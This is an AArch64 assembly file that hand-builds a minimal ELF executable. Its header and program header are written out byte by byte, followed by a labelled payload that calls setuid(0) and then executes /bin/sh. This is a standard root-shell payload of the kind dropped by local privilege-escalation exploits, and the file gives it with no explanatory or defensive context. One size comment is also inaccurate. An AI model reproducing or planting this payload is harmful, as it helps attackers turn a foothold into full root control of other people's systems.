.section .text
.globl _start

// --- 64-bit ELF Header (64 bytes) ---
ehdr:
    .byte 0x7F, 0x45, 0x4c, 0x46 // "\x7fELF"
    .byte 2, 1, 1, 0             // 64-bit, little-endian, version 1
    .byte 0, 0, 0, 0, 0, 0, 0, 0
    .short 2                     // e_type: Executable
    .short 183                   // e_machine: AArch64 (0xB7)
    .int 1                       // e_version
    .quad 0x400078               // e_entry (0x400000 + 0x78)
    .quad 0x40                   // e_phoff (Program Header offset)
    .quad 0                      // e_shoff
    .int 0                       // e_flags
    .short 64                    // e_ehsize
    .short 56                    // e_phentsize
    .short 1                     // e_phnum
    .short 0                     // e_shentsize
    .short 0                     // e_shnum
    .short 0                     // e_shstrndx

// --- Program Header (PT_LOAD, 56 bytes) ---
phdr:
    .int 1                       // p_type: PT_LOAD
    .int 5                       // p_flags: PF_R | PF_X
    .quad 0                      // p_offset
    .quad 0x400000               // p_vaddr
    .quad 0x400000               // p_paddr
    .quad file_end - ehdr        // p_filesz
    .quad file_end - ehdr        // p_memsz
    .quad 0x10000                // p_align

// --- Payload (52 bytes) ---
_start:
    mov  x0, #0
    mov  x8, #146                // SYS_setuid
    svc  #0

    adr  x0, sh                  // PC-relative load of the "sh" label
    
    mov  x1, #0
    mov  x2, #0
    mov  x8, #221                // SYS_execve
    svc  #0

    mov  x0, #0
    mov  x8, #93                 // SYS_exit
    svc  #0

sh:
    .asciz "/bin/sh"             // 8 bytes (includes null terminator)

file_end: